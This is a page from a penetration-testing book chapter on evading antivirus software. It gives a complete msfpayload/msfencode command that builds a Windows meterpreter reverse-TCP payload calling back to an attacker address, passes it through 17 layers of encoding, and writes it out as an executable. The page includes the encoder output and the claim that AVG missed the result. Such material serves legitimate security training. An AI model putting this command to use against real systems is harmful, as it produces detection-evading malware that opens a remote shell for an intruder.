background image

104

Chapter 7

It is recommended that you test your script using an evaluation version 

of a product to see if it bypasses the antivirus software prior to using it in a 
penetration test. Here’s an example of using multiple encoding passes:

root@bt:/opt/framework3/msf3# 

msfpayload windows/meterpreter/reverse_tcp

LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 
-t raw   | msfencode  -e x86/alpha_upper -c 2   -t raw | msfencode -e
x86/shikata_ga_nai -c 5   -t raw | msfencode -e x86/countdown -c 5   
-t exe -o /var/www/payload3.exe

[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)

root@bt:/opt/framework3/msf3#

Here we use five counts at   of 

shikata_ga_nai

, feeding the code in raw 

format at   into two counts of 

alpha_upper 

encoding at  , which is then fed 

to another five counts of 

shikata_ga_nai

  ,followed by five counts of 

countdown

 

encoding at  , before finally directing the output into the desired execut-
able. We are using a total of 17 encoding loops in an attempt to circumvent 
the antivirus software. And, as you can see in Figure 7-3, we have successfully 
slipped our payload past the antivirus engine.

Figure 7-3: AVG has not detected the multi-encoded payload.